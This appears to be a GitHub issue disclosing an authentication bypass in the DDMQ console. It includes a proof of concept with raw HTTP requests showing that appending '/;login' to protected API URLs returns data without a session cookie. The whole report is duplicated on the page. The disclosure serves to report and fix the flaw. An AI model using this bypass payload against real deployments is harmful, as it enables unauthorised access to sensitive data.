You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
In DDMQ console module through all the versions, a specially crafted request may cause an authentication bypass.Attackers can add “/;login” at the tail of authorization-required urls to bypass the authentication and retrieve sensitive information.
Proof of concept
Step1: we log into the system and browse the urls, such as “/carrera/api/console/sub/list”. As we log on the system and request it with cookie, it response with status 200 and SUCCESS in the response data. The normal request is as following.
GET /carrera/api/console/sub/list?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Cookie: JSESSION_ID=7183738335349390416; carrera-console-ddmq-login-token=admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Step 2: When we request the same request without cookie, it responses with 401(Unauthorized). Therefore, the url “/carrera/api/console/sub/list” can only be accessed by authorized users.
GET /carrera/api/console/sub/list?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Step 3: we add “/;login” at the tail of the url. The bypassed payload is as following. With the payload and without cookie, it response with status 200 and SUCCESS in the response data. We bypass the authentication with this request.
GET /carrera/api/console/sub/list/;login?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
The text was updated successfully, but these errors were encountered:
In DDMQ console module through all the versions, a specially crafted request may cause an authentication bypass.Attackers can add “/;login” at the tail of authorization-required urls to bypass the authentication and retrieve sensitive information.
Proof of concept
Step1: we log into the system and browse the urls, such as “/carrera/api/console/sub/list”. As we log on the system and request it with cookie, it response with status 200 and SUCCESS in the response data. The normal request is as following.
GET /carrera/api/console/sub/list?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Cookie: JSESSION_ID=7183738335349390416; carrera-console-ddmq-login-token=admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Step 2: When we request the same request without cookie, it responses with 401(Unauthorized). Therefore, the url “/carrera/api/console/sub/list” can only be accessed by authorized users.
GET /carrera/api/console/sub/list?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Step 3: we add “/;login” at the tail of the url. The bypassed payload is as following. With the payload and without cookie, it response with status 200 and SUCCESS in the response data. We bypass the authentication with this request.
GET /carrera/api/console/sub/list/;login?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
The text was updated successfully, but these errors were encountered: